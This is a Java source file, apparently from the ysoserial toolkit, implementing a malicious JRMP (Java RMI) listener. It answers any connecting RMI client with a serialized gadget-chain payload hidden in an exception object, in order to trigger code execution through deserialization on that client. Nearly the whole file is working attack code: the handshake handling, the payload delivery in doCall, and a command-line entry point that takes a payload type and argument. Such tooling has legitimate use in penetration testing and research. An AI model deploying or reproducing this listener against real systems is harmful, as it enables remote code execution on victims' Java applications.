package ysoserial.exploit;


import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.OutputStream;
import java.io.Serializable;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.SocketException;
import java.net.URL;
import java.rmi.MarshalException;
import java.rmi.server.ObjID;
import java.rmi.server.UID;
import java.util.Arrays;

import javax.management.BadAttributeValueExpException;
import javax.net.ServerSocketFactory;

import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import sun.rmi.transport.TransportConstants;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Reflections;


/**
 * Generic JRMP listener
 *
 * Opens up a JRMP listener that will deliver the specified payload to any
 * client connecting to it and making a call.
 *
 * The listener is driven by {@link #run()}, which accepts connections one at
 * a time on the calling thread. {@link #waitFor(int)} and {@link #close()} may
 * be called from other threads; the state they share with {@link #run()} is
 * guarded by an internal monitor.
 *
 * @author mbechler
 *
 */
@SuppressWarnings ( {
    "restriction"
} )
public class JRMPListener implements Runnable {

    private final int port;
    private final Object payloadObject;
    private final ServerSocket ss;
    private final URL classpathUrl;

    /** Monitor guarding {@link #hadConnection}; also notified by {@link #close()}. */
    private final Object waitLock = new Object();

    /** Set by {@link #close()}; read by the accept loop and by waiters on other threads. */
    private volatile boolean exit;

    /** Set once a payload has been written in response to a call. */
    private volatile boolean hadConnection;


    /**
     * Creates a listener that answers calls with the given payload object and
     * binds the server socket immediately.
     *
     * @param port
     *            local port to listen on
     * @param payloadObject
     *            object delivered to calling clients
     * @throws IOException
     *             if the server socket cannot be created
     */
    public JRMPListener ( int port, Object payloadObject ) throws NumberFormatException, IOException {
        this.port = port;
        this.payloadObject = payloadObject;
        this.classpathUrl = null;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
    }


    /**
     * Creates a listener that answers calls with an instance of a generated
     * class named {@code className} (see {@link #makeDummyObject(String)}) and
     * passes {@code classpathUrl} to the marshalling output stream.
     *
     * @param port
     *            local port to listen on
     * @param className
     *            name given to the generated dummy class
     * @param classpathUrl
     *            URL handed to {@code JRMPClient.MarshalOutputStream}
     * @throws IOException
     *             if the server socket cannot be created
     */
    public JRMPListener ( int port, String className, URL classpathUrl ) throws IOException {
        this.port = port;
        this.payloadObject = makeDummyObject(className);
        this.classpathUrl = classpathUrl;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
    }


    /**
     * Blocks until a payload has been delivered, the listener is closed, the
     * timeout elapses or the calling thread is interrupted.
     *
     * @param i
     *            timeout in milliseconds as accepted by {@link Object#wait(long)};
     *            {@code 0} waits without a timeout
     * @return {@code true} if a payload has been delivered, {@code false}
     *         otherwise (including on interruption, in which case the
     *         thread's interrupt flag is restored)
     */
    public boolean waitFor ( int i ) {
        // The check and the wait happen under the same monitor that doCall()
        // holds while setting the flag, so a notification cannot be missed.
        synchronized ( this.waitLock ) {
            if ( this.hadConnection ) {
                return true;
            }

            System.err.println("Waiting for connection");

            final long startNanos = System.nanoTime();
            long remainingMillis = i;
            try {
                // Loop to tolerate spurious wakeups; close() ends the wait via 'exit'.
                while ( !this.hadConnection && !this.exit ) {
                    this.waitLock.wait(remainingMillis);
                    if ( i > 0 ) {
                        remainingMillis = i - ( System.nanoTime() - startNanos ) / 1000000L;
                        if ( remainingMillis <= 0 ) {
                            break;
                        }
                    }
                }
            }
            catch ( InterruptedException e ) {
                Thread.currentThread().interrupt();
                return false;
            }
            return this.hadConnection;
        }
    }


    /**
     * Stops the listener: flags the accept loop to exit, closes the server
     * socket and wakes every thread blocked in {@link #waitFor(int)}.
     */
    public void close () {
        this.exit = true;
        closeQuietly(this.ss);
        synchronized ( this.waitLock ) {
            this.waitLock.notifyAll();
        }
    }


    /**
     * Command line entry point: {@code <port> <payload_type> <payload_arg>}.
     * Builds the payload, runs a listener on the calling thread and releases
     * the payload when the listener returns.
     *
     * @param args
     *            command line arguments
     */
    public static final void main ( final String[] args ) {

        if ( args.length < 3 ) {
            System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <payload_arg>");
            System.exit(-1);
            return;
        }

        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], args[ 2 ]);

        try {
            int port = Integer.parseInt(args[ 0 ]);
            System.err.println("* Opening JRMP listener on " + port);
            JRMPListener c = new JRMPListener(port, payloadObject);
            c.run();
        }
        catch ( Exception e ) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
        finally {
            // Release even if something other than an Exception escapes.
            Utils.releasePayload(args[ 1 ], payloadObject);
        }
    }


    /**
     * Accept loop. Handles one connection at a time until {@link #close()} is
     * called or accepting fails, then closes the server socket.
     */
    public void run () {
        try {
            Socket s = null;
            try {
                while ( !this.exit && ( s = this.ss.accept() ) != null ) {
                    try {
                        handleConnection(s);
                    }
                    catch ( InterruptedException e ) {
                        Thread.currentThread().interrupt();
                        return;
                    }
                    catch ( Exception e ) {
                        // A failing client must not take the listener down.
                        e.printStackTrace(System.err);
                    }
                    finally {
                        System.err.println("Closing connection");
                        closeQuietly(s);
                    }
                }
            }
            finally {
                closeQuietly(s);
                closeQuietly(this.ss);
            }
        }
        catch ( SocketException e ) {
            // Not reported; closing the server socket from close() is expected to end up here.
            return;
        }
        catch ( Exception e ) {
            e.printStackTrace(System.err);
        }
    }


    /**
     * Performs the transport handshake on an accepted socket and, for the
     * stream and single-op protocols, processes one message. The caller is
     * responsible for closing the socket.
     */
    private void handleConnection ( Socket s ) throws Exception {
        s.setSoTimeout(5000);
        InetSocketAddress remote = (InetSocketAddress) s.getRemoteSocketAddress();
        System.err.println("Have connection from " + remote);

        InputStream is = s.getInputStream();
        InputStream bufIn = is.markSupported() ? is : new BufferedInputStream(is);

        // Read magic (or HTTP wrapper)
        // NOTE: the mark is never reset; only plain JRMP headers are handled here.
        bufIn.mark(4);
        DataInputStream in = new DataInputStream(bufIn);
        int magic = in.readInt();
        short version = in.readShort();
        if ( magic != TransportConstants.Magic || version != TransportConstants.Version ) {
            return;
        }

        OutputStream sockOut = s.getOutputStream();
        DataOutputStream out = new DataOutputStream(new BufferedOutputStream(sockOut));

        byte protocol = in.readByte();
        switch ( protocol ) {
        case TransportConstants.StreamProtocol:
            out.writeByte(TransportConstants.ProtocolAck);
            if ( remote.getHostName() != null ) {
                out.writeUTF(remote.getHostName());
            }
            else {
                out.writeUTF(remote.getAddress().toString());
            }
            out.writeInt(remote.getPort());
            out.flush();
            // The client's reply to the ack (a UTF string and an int) is read and discarded.
            in.readUTF();
            in.readInt();
            // intentional fall-through: after the handshake the message is handled as for single-op
        case TransportConstants.SingleOpProtocol:
            // doMessage flushes 'out' and closes the socket itself.
            doMessage(s, in, out, this.payloadObject);
            break;
        case TransportConstants.MultiplexProtocol:
        default:
            System.err.println("Unsupported protocol");
            break;
        }
    }


    /**
     * Reads one transport operation and answers it, then flushes the response
     * and closes the socket.
     *
     * @throws IOException
     *             if the operation code is not one of Call, Ping or DGCAck
     */
    private void doMessage ( Socket s, DataInputStream in, DataOutputStream out, Object payload ) throws Exception {
        System.err.println("Reading message...");

        int op = in.read();

        switch ( op ) {
        case TransportConstants.Call:
            // service incoming RMI call
            doCall(in, out, payload);
            break;

        case TransportConstants.Ping:
            // send ack for ping
            out.writeByte(TransportConstants.PingAck);
            break;

        case TransportConstants.DGCAck:
            // consume the UID; its value is not needed
            UID.read(in);
            break;

        default:
            throw new IOException("unknown transport op " + op);
        }

        // Flush before closing: 'out' is buffered, and anything still in the
        // buffer (e.g. the PingAck byte) would otherwise never be sent.
        out.flush();
        s.close();
    }


    /**
     * Answers an incoming call with an exceptional return whose exception
     * object carries the payload, then marks the listener as having served a
     * connection and wakes waiters.
     */
    private void doCall ( DataInputStream in, DataOutputStream out, Object payload ) throws Exception {
        // Only the classes needed to parse the call header may be deserialized from the client.
        ObjectInputStream ois = new ObjectInputStream(in) {

            @Override
            protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException {
                if ( "[Ljava.rmi.server.ObjID;".equals(desc.getName()) ) {
                    return ObjID[].class;
                }
                else if ( "java.rmi.server.ObjID".equals(desc.getName()) ) {
                    return ObjID.class;
                }
                else if ( "java.rmi.server.UID".equals(desc.getName()) ) {
                    return UID.class;
                }
                throw new IOException("Not allowed to read object");
            }
        };

        ObjID read;
        try {
            read = ObjID.read(ois);
        }
        catch ( java.io.IOException e ) {
            throw new MarshalException("unable to read objID", e);
        }

        // Same test as before (hash code equals 2), spelled with the named constant.
        if ( read.hashCode() == ObjID.DGC_ID ) {
            ois.readInt(); // method
            ois.readLong(); // hash
            System.err.println("Is DGC call for " + Arrays.toString((ObjID[]) ois.readObject()));
        }

        System.err.println("Sending return with payload for obj " + read);

        out.writeByte(TransportConstants.Return);// transport op
        ObjectOutputStream oos = new JRMPClient.MarshalOutputStream(out, this.classpathUrl);

        oos.writeByte(TransportConstants.ExceptionalReturn);
        new UID().write(oos);

        // The payload is placed in the exception's 'val' field via reflection.
        BadAttributeValueExpException ex = new BadAttributeValueExpException(null);
        Reflections.setFieldValue(ex, "val", payload);
        oos.writeObject(ex);

        oos.flush();
        out.flush();

        // Publish the flag under the monitor so waitFor() cannot miss the notification.
        synchronized ( this.waitLock ) {
            this.hadConnection = true;
            this.waitLock.notifyAll();
        }
    }


    /**
     * Creates an instance of a copy of {@link Dummy} renamed to
     * {@code className} and defined in a fresh class loader.
     *
     * @param className
     *            name for the generated class
     * @return the new instance, or an empty {@code byte[]} if generation
     *         fails (the failure is printed to standard error)
     */
    protected static Object makeDummyObject ( String className ) {
        try {
            ClassLoader isolation = new ClassLoader() {};
            ClassPool cp = new ClassPool();
            cp.insertClassPath(new ClassClassPath(Dummy.class));
            CtClass clazz = cp.get(Dummy.class.getName());
            clazz.setName(className);
            return clazz.toClass(isolation).newInstance();
        }
        catch ( Exception e ) {
            e.printStackTrace();
            return new byte[0];
        }
    }


    /** Closes the socket if non-null; close failures are deliberately ignored (best-effort cleanup). */
    private static void closeQuietly ( Socket socket ) {
        if ( socket == null ) {
            return;
        }
        try {
            socket.close();
        }
        catch ( IOException ignored ) {
            // nothing useful can be done about a failed close
        }
    }


    /** Closes the server socket if non-null; close failures are deliberately ignored (best-effort cleanup). */
    private static void closeQuietly ( ServerSocket serverSocket ) {
        if ( serverSocket == null ) {
            return;
        }
        try {
            serverSocket.close();
        }
        catch ( IOException ignored ) {
            // nothing useful can be done about a failed close
        }
    }


    /** Template class that {@link #makeDummyObject(String)} copies and renames. */
    public static class Dummy implements Serializable {

        private static final long serialVersionUID = 1L;

    }
}